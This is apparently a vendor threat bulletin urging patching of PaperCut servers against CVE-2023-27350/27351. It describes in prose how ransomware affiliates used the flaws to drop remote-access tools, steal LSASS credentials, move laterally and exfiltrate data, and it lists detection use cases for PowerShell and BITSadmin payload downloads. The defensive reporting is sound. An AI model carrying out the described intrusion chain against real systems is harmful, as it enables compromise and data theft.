2023-05-15

Patch PaperCut Servers to Defend Against Exploit

Level: 
Tactical
  |  Source: 
Horizon3
Global
Share:

Patch PaperCut Servers to Defend Against Exploit

Category: Vulnerability | Industry: Global | Level: Tactical | Sources: Horizon3 & Huntress & Microsoft

Horizon3 has released a proof-of-concept (PoC) exploiting PaperCut print management software to achieve remote code execution (RCE). The PoC targets vulnerabilities CVE-2023-27350 and CVE-2023-27351, enabling attackers to perform low-complexity attacks without user interaction. This allows them to bypass authentication and execute arbitrary code on PaperCut servers compromised with SYSTEM privileges. "Both of these vulnerabilities have been fixed in PaperCut MF and PaperCut NG versions 20.1.7, 21.2.11 and 22.0.9 and later," as stated by PaperCut in their latest security advisory. The attack surface for the exploit is found to be relatively small with a Shodon search only identifying approximately 1,700 internet-facing servers. Researchers from Huntress have observed PaperCut servers being exploited to execute PowerShell commands to drop remote access software such as Atera and Syncro. Based on registered infrastructure dropping the software, operators from the Clop ransomware gang are involved in exploiting PaperCut servers, leading to concerns about potential ransomware attacks due to this exploit.

The Clop and LockBit ransomware gangs are attributed to attacks exploiting PaperCut servers. In a tweet from Microsoft's Threat Intelligence team, Clop ransomware affiliates were observed running "PowerShell commands to deliver a TrueBot DLL, which connected to a C2 server, attempted to steal LSASS credentials, and injected the TrueBot payload into the conhost.exe service." The operators then installed a Cobalt Beacon, running reconnaissance commands and using WMI to achieve lateral movement. Data was found to be exfiltrated to MegaSync. While fewer details were provided for LockBit, Microsoft shared they've also observed intrusions resulting in LockBit ransomware.

Anvilogic Scenarios:

  • PS/BitsAdmin Downloads Payload for Remote Access
  • PowerShell Fuels System Compromise for Lateral Movement

Anvilogic Use Cases:

  • Invoke-WebRequest Command
  • BITSadmin Execution
  • AnyDesk Execution from Suspicious Folder

Get trending threats published weekly by the Anvilogic team.

Sign Up Now